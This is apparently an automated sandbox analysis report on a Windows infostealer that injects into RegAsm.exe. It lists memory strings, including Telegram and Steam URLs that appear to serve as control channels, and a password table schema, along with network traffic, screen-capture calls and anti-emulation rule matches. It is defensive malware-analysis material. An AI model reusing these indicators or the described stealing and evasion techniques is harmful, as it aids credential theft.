                Source: file.exe, 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199698764354
                Source: RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/i
                Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/r8z0l
                Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/r8z0lF
                Source: RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/w
                Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: FBKECF.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: FBKECF.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004120E5 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004120E5

                System Summary

                barindex
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010080C20_2_010080C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010035300_2_01003530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010115830_2_01011583
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010004540_2_01000454
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100C81A0_2_0100C81A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100FBE50_2_0100FBE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D0792_2_0041D079
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E1F72_2_0041E1F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D5CA2_2_0041D5CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F6E02_2_0041F6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B694CF02_2_1B694CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7A9A202_2_1B7A9A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6820182_2_1B682018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7359402_2_1B735940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B681C9E2_2_1B681C9E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B682AA92_2_1B682AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6812A82_2_1B6812A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B1C502_2_1B6B1C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7E9CC02_2_1B7E9CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68292D2_2_1B68292D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6835802_2_1B683580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7153B02_2_1B7153B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B85D2092_2_1B85D209
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7A50402_2_1B7A5040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6990002_2_1B699000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B73D6D02_2_1B73D6D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7296902_2_1B729690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7E94302_2_1B7E9430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68D4C02_2_1B68D4C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B784A602_2_1B784A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68C8002_2_1B68C800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B681EF12_2_1B681EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6BCE102_2_1B6BCE10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6A8D2A2_2_1B6A8D2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B683AB22_2_1B683AB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7081202_2_1B708120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7A80302_2_1B7A8030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7000902_2_1B700090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6A87632_2_1B6A8763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6E47602_2_1B6E4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7187602_2_1B718760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6A86802_2_1B6A8680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7C04802_2_1B7C0480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6ABAB02_2_1B6ABAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68251D2_2_1B68251D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B78102_2_1B6B7810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68290A2_2_1B68290A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B33702_2_1B6B3370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68F1602_2_1B68F160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68174E2_2_1B68174E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68AA402_2_1B68AA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68EA802_2_1B68EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B77A9402_2_1B77A940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B79A9002_2_1B79A900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7669C02_2_1B7669C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68481D2_2_1B68481D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7BE8002_2_1B7BE800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B683E3B2_2_1B683E3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B85AEBE2_2_1B85AEBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6E2EE02_2_1B6E2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6C6E802_2_1B6C6E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6819DD2_2_1B6819DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B68209F2_2_1B68209F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B70A0B02_2_1B70A0B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6966C02_2_1B6966C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6AA5602_2_1B6AA560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B77A5902_2_1B77A590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6847AF2_2_1B6847AF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FFA750 appears 52 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B683AF3 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B68395E appears 81 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B681F5A appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B8606B1 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004195FA appears 112 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B68415B appears 173 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B681C2B appears 47 times
                Source: file.exeStatic PE information: invalid certificate
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/11@2/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004110AB _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_004110AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004114AC _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,2_2_004114AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\60JGYAOC.htmJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: IDAEHC.2.dr, HJJKFB.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: file.exeReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418AFD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418AFD
                Source: sqls[1].dll.2.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA00C push ecx; ret 0_2_00FFA01F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A725 push ecx; ret 2_2_0041A738
